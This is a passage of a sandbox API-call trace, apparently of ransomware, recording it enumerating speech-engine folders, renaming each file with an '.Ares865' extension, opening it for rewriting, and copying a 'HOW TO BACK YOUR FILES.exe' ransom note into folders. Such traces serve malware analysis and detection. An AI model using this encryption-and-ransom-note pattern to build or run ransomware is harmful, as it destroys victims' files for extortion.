ftLastAccessTime.dwLowDateTime=0x1ea1accb, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea1accb, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0147.128] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0147.128] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0147.129] lstrcpyW (in: lpString1=0x2cce490, lpString2="enu-dsk" | out: lpString1="enu-dsk") returned="enu-dsk" [0147.129] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7968 [0147.129] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa0) returned 0x320fc8 [0147.129] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7970 | out: ListHead=0x2e7710, ListEntry=0x2e7970) returned 0x2e7950 [0147.129] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf7b89235, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0xf7b89235, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0x9fa0a390, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x43200, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSTTSFrontendENU.dll", cAlternateFileName="")) returned 1 [0147.129] lstrcmpiW (lpString1="MSTTSFrontendENU.dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0147.129] lstrcmpiW (lpString1="MSTTSFrontendENU.dll", lpString2="aoldtz.exe") returned 1 [0147.129] lstrcpyW (in: lpString1=0x2cce490, lpString2="MSTTSFrontendENU.dll" | out: lpString1="MSTTSFrontendENU.dll") returned="MSTTSFrontendENU.dll" [0147.129] lstrlenW (lpString="MSTTSFrontendENU.dll") returned 20 [0147.129] lstrlenW (lpString="Ares865") returned 7 [0147.129] lstrcmpiW (lpString1="ENU.dll", lpString2="Ares865") returned 1 [0147.129] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\MSTTSFrontendENU.dll.Ares865") returned 100 [0147.129] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\MSTTSFrontendENU.dll" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\msttsfrontendenu.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\MSTTSFrontendENU.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\msttsfrontendenu.dll.ares865"), dwFlags=0x1) returned 1 [0147.131] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\MSTTSFrontendENU.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\msttsfrontendenu.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0147.131] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=274944) returned 1 [0147.131] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0147.131] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0147.131] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0147.152] lstrcpyW (in: lpString1=0x2cce490, lpString2="MSTTSLoc.dll.mui" | out: lpString1="MSTTSLoc.dll.mui") returned="MSTTSLoc.dll.mui" [0147.152] lstrlenW (lpString="MSTTSLoc.dll.mui") returned 16 [0147.152] lstrlenW (lpString="Ares865") returned 7 [0147.152] lstrcmpiW (lpString1="dll.mui", lpString2="Ares865") returned 1 [0147.153] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\MSTTSLoc.dll.mui.Ares865") returned 96 [0147.153] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\MSTTSLoc.dll.mui" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\msttsloc.dll.mui"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\MSTTSLoc.dll.mui.Ares865" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\msttsloc.dll.mui.ares865"), dwFlags=0x1) returned 1 [0147.154] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\MSTTSLoc.dll.mui.Ares865" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\msttsloc.dll.mui.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0147.154] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0147.154] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0147.155] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0147.155] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0147.157] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk") returned="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk" [0147.157] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x320fc8 | out: hHeap=0x2b0000) returned 1 [0147.157] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7968 | out: hHeap=0x2b0000) returned 1 [0147.157] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk") returned 79 [0147.158] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk" | out: lpString1="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk") returned="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk" [0147.158] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0147.158] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\enu-dsk\\how to back your files.exe"), bFailIfExists=1) returned 0 [0147.167] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0147.167] GetLastError () returned 0x0 [0147.167] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0147.167] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0147.167] CloseHandle (hObject=0x120) returned 1 [0147.167] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0147.167] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0147.167] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8f7490, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd8f7490, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd8f7490, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0147.168] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0147.168] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0147.168] lstrcpyW (in: lpString1=0x2cce4a0, lpString2="M1033DSK.APL" | out: lpString1="M1033DSK.APL") returned="M1033DSK.APL" [0147.168] lstrlenW (lpString="M1033DSK.APL") returned 12 [0147.168] lstrlenW (lpString="Ares865") returned 7 [0147.168] lstrcmpiW (lpString1="DSK.APL", lpString2="Ares865") returned 1 [0147.169] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.APL.Ares865") returned 100 [0147.169] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.APL" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\enu-dsk\\m1033dsk.apl"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.APL.Ares865" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\enu-dsk\\m1033dsk.apl.ares865"), dwFlags=0x1) returned 1 [0147.170] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.APL.Ares865" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\enu-dsk\\m1033dsk.apl.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0147.171] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=16066) returned 1 [0147.171] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0147.171] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0147.171] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0147.174] lstrcpyW (in: lpString1=0x2cce4a0, lpString2="M1033DSK.CRT" | out: lpString1="M1033DSK.CRT") returned="M1033DSK.CRT" [0147.174] lstrlenW (lpString="M1033DSK.CRT") returned 12 [0147.174] lstrlenW (lpString="Ares865") returned 7 [0147.174] lstrcmpiW (lpString1="DSK.CRT", lpString2="Ares865") returned 1 [0147.174] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.CRT.Ares865") returned 100 [0147.174] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.CRT" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\enu-dsk\\m1033dsk.crt"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.CRT.Ares865" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\enu-dsk\\m1033dsk.crt.ares865"), dwFlags=0x1) returned 1 [0147.176] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.CRT.Ares865" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\enu-dsk\\m1033dsk.crt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0147.176] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=484600) returned 1 [0147.176] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0147.177] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0147.177] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0147.215] lstrcpyW (in: lpString1=0x2cce4a0, lpString2="M1033DSK.CSD" | out: lpString1="M1033DSK.CSD") returned="M1033DSK.CSD" [0147.215] lstrlenW (lpString="M1033DSK.CSD") returned 12 [0147.215] lstrlenW (lpString="Ares865") returned 7 [0147.215] lstrcmpiW (lpString1="DSK.CSD", lpString2="Ares865") returned 1 [0147.215] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.CSD.Ares865") returned 100 [0147.215] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.CSD" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\enu-dsk\\m1033dsk.csd"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.CSD.Ares865" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\enu-dsk\\m1033dsk.csd.ares865"), dwFlags=0x1) returned 1 [0147.218] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.CSD.Ares865" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\enu-dsk\\m1033dsk.csd.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0147.218] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=29798100) returned 1 [0147.218] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0147.218] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0147.218] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0147.375] lstrcpyW (in: lpString1=0x2cce4a0, lpString2="M1033DSK.IDX" | out: lpString1="M1033DSK.IDX") returned="M1033DSK.IDX" [0147.375] lstrlenW (lpString="M1033DSK.IDX") returned 12 [0147.375] lstrlenW (lpString="Ares865") returned 7 [0147.375] lstrcmpiW (lpString1="DSK.IDX", lpString2="Ares865") returned 1 [0147.375] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.IDX.Ares865") returned 100 [0147.375] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.IDX" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\enu-dsk\\m1033dsk.idx"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.IDX.Ares865" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\enu-dsk\\m1033dsk.idx.ares865"), dwFlags=0x1) returned 1 [0147.378] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.IDX.Ares865" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\enu-dsk\\m1033dsk.idx.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0147.378] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=132508) returned 1 [0147.378] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0147.378] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0147.379] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0147.389] lstrcpyW (in: lpString1=0x2cce4a0, lpString2="M1033DSK.LTS" | out: lpString1="M1033DSK.LTS") returned="M1033DSK.LTS" [0147.389] lstrlenW (lpString="M1033DSK.LTS") returned 12 [0147.389] lstrlenW (lpString="Ares865") returned 7 [0147.389] lstrcmpiW (lpString1="DSK.LTS", lpString2="Ares865") returned 1 [0147.389] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.LTS.Ares865") returned 100 [0147.389] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.LTS" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\enu-dsk\\m1033dsk.lts"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.LTS.Ares865" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\enu-dsk\\m1033dsk.lts.ares865"), dwFlags=0x1) returned 1 [0147.393] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.LTS.Ares865" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\enu-dsk\\m1033dsk.lts.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0147.393] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=931696) returned 1 [0147.393] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0147.394] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0147.394] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0147.486] lstrcpyW (in: lpString1=0x2cce4a0, lpString2="M1033DSK.TTS" | out: lpString1="M1033DSK.TTS") returned="M1033DSK.TTS" [0147.486] lstrlenW (lpString="M1033DSK.TTS") returned 12 [0147.486] lstrlenW (lpString="Ares865") returned 7 [0147.486] lstrcmpiW (lpString1="DSK.TTS", lpString2="Ares865") returned 1 [0147.486] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.TTS.Ares865") returned 100 [0147.486] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.TTS" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\enu-dsk\\m1033dsk.tts"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.TTS.Ares865" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\enu-dsk\\m1033dsk.tts.ares865"), dwFlags=0x1) returned 1 [0147.496] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.TTS.Ares865" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\enu-dsk\\m1033dsk.tts.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0147.496] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2430393) returned 1 [0147.496] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0147.496] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0147.496] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0147.662] lstrcpyW (in: lpString1=0x2cce4a0, lpString2="M1033DSK.UDT" | out: lpString1="M1033DSK.UDT") returned="M1033DSK.UDT" [0147.662] lstrlenW (lpString="M1033DSK.UDT") returned 12 [0147.662] lstrlenW (lpString="Ares865") returned 7 [0147.662] lstrcmpiW (lpString1="DSK.UDT", lpString2="Ares865") returned 1 [0147.663] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.UDT.Ares865") returned 100 [0147.663] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.UDT" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\enu-dsk\\m1033dsk.udt"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.UDT.Ares865" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\enu-dsk\\m1033dsk.udt.ares865"), dwFlags=0x1) returned 1 [0147.666] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.UDT.Ares865" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\enu-dsk\\m1033dsk.udt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0147.666] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=11166) returned 1 [0147.666] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0147.666] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0147.666] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0147.670] lstrcpyW (in: lpString1=0x2cce4a0, lpString2="M1033DSK.UNT" | out: lpString1="M1033DSK.UNT") returned="M1033DSK.UNT" [0147.670] lstrlenW (lpString="M1033DSK.UNT") returned 12 [0147.670] lstrlenW (lpString="Ares865") returned 7 [0147.670] lstrcmpiW (lpString1="DSK.UNT", lpString2="Ares865") returned 1 [0147.670] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.UNT.Ares865") returned 100 [0147.670] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.UNT" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\enu-dsk\\m1033dsk.unt"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.UNT.Ares865" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\enu-dsk\\m1033dsk.unt.ares865"), dwFlags=0x1) returned 1 [0147.672] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.UNT.Ares865" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\enu-dsk\\m1033dsk.unt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0147.672] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3182160) returned 1 [0147.672] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0147.672] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0147.672] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0147.828] lstrcpyW (in: lpString1=0x2cce4a0, lpString2="M1033DSK.WIH" | out: lpString1="M1033DSK.WIH") returned="M1033DSK.WIH" [0147.829] lstrlenW (lpString="M1033DSK.WIH") returned 12 [0147.829] lstrlenW (lpString="Ares865") returned 7 [0147.829] lstrcmpiW (lpString1="DSK.WIH", lpString2="Ares865") returned 1 [0147.829] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.WIH.Ares865") returned 100 [0147.829] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.WIH" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\enu-dsk\\m1033dsk.wih"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.WIH.Ares865" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\enu-dsk\\m1033dsk.wih.ares865"), dwFlags=0x1) returned 1 [0147.832] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.WIH.Ares865" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\enu-dsk\\m1033dsk.wih.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0147.832] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3597414) returned 1 [0147.832] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0147.832] 